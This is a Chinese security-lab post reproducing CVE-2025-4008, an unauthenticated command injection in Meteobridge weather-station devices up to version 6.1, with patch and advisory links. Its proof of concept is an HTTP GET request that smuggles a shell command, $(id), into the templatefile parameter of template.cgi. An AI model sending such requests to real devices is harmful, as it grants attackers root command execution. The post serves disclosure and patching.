网安引领时代,弥天点亮未来
本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
Meteobridge是Meteobridge公司的一款小型设备,可将个人气象站连接到公共气象网络。
Meteobridge存在安全漏洞,该漏洞源于Web接口端点存在命令注入漏洞,可能导致未经认证的远程攻击者以root权限执行任意命令。
Meteobridge<= 6.1
1.访问漏洞环境
2.对漏洞进行复现
POC
漏洞复现
GET /public/template.cgi?templatefile=$(id) HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0
执行id命令,通过相应判断漏洞存在
3.Yakit插件测试
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
可以通过检查Meteobridge的版本号来确定是否受影响,使用命令`cat /version`查看当前版本。
建议尽快升级修复漏洞,再次声明本文仅供学习使用,非法他用责任自负!
https://forum.meteohub.de/viewtopic.php?t=18687
https://www.onekey.com/resource/security-advisory-remote-command-execution-on-smartbedded-meteobridge-cve-2025-4008
原文始发于微信公众号(弥天安全实验室):【成功复现】Meteobridge命令执行漏洞(CVE-2025-4008)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论